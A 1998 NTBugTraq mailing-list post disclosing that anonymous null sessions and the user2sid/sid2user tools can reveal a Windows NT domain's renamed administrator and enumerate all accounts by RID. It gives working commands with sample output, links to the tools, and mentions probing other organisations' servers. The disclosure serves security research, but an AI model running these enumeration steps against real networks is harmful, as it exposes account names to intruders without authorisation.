Date:         Tue, 28 Apr 1998 10:21:46 +0400
Reply-To: Evgenii Borisovich Rudnyi <rudnyi@MCH1.CHEM.MSU.SU>
Sender: Windows NT BugTraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
From: Evgenii Borisovich Rudnyi <rudnyi@MCH1.CHEM.MSU.SU>
Subject:      name of built-in administrator
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

While learning what SID is, I have written two utilities, user2sid and
sid2user, which are actually command line interfaces to WIN32 functions,
LookupAccountName and LookupAccountSid. So, no hacking, just what is
permitted by MS.

Now, it happens that to use these function a user have just to be
EVERYONE. It means that an ordinary user can find without a problem a
built-in domain administrator name, which MS recommends us to rename
from administrator to something else (see for example, course 803,
Administrating Windows NT 4.0).

Assuming that user's computer is in the domain, the task is solved by
two steps.

1) Looking up a SID of any domain account, for example Domain Users

  user2sid "domain users"

  S-1-5-21-201642981-56263093-24269216-513

Now we know all the subauthorities for the current domain. All the
domain account SIDs are different by the last number only (so called RID).

2) Looking up an built-in administrator name (RID is always 500)

  sid2user 5 21 201642981 56263093 24269216 500

  Name is SmallUser
  Domain is DomainName
  Type of SID is SidTypeUser

3) Now it is possible to look up all the domain accounts from the very
first one (RID = 1000 for the first account, 1001 for the second and so
on, RIDs are never used again for the current installation).

  sid2user 5 21 201642981 56263093 24269216 1000
  sid2user 5 21 201642981 56263093 24269216 1001
  ...

It should be interesting for everyone to know the history of developing
the domain account database.

Well, this is not the end of the story. The anonymous logon is also in
the EVERYONE group. This means that actually it is possible to find out
who is a built-in administrator and to see the history of the SAM at any
domain into which you can run the anonymous session. Note that anonymous
sessions are not audited by logon/logoff category.

I have tried it here on several MS APEC and SD centers. It happens that
none of their administrators has bothered to disable netbios ports. So,
below is an example of what you can learn provided the netbios ports are
open (the listing is fictional).

  nslookup www.xyz.com

    Non-authoritative answer:
    Name:    www.xyz.com
    Address:  131.107.2.200

  net use \\131.107.2.200\ipc$ "" /user:""
    The command completed successfully.

  user2sid \\131.107.2.200 "domain users"

    S-1-5-21-201642981-56263093-24269216-513

    Number of subauthorities is 5
    Domain is XYZ_domain
    Length of SID in memory is 28 bytes
    Type of SID is SidTypeGroup

  sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 500

    Name is XYZAdmin
    Domain is XYZ_domain
    Type of SID is SidTypeUser

  sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1000

    Name is
    Domain is XYZ_domain
    Type of SID is SidTypeDeletedAccount

  sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1001

    Name is Simpson
    Domain is XYZ_domain
    Type of SID is SidTypeUser

  sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1112

    LookupSidName failed - no such account

SP3 does not prevent this to happen (at least without further manual
editing the registry).

As I see it, it is not a bug. I have made nothing illegal, just
following the WIN32 manual. Thus, this is the feature.

For those who would like to try it, the utilities can be found at my
homepages

  http://www.chem.msu.su/~rudnyi/NT/sid.zip

The file is about 50 Kb, the link may be slow though. I give them to
public domain, feel free to publish them from your servers if you want
it to.

Good hunting,

Evgenii Rudnyi

--
Chemistry Department     rudnyi@comp.chem.msu.su
Moscow State University  http://www.chem.msu.su/~rudnyi/welcome.html
119899 Moscow            +7(095)939 5452, fax+7(095)932 8846,+7(095)939 1205
Russia

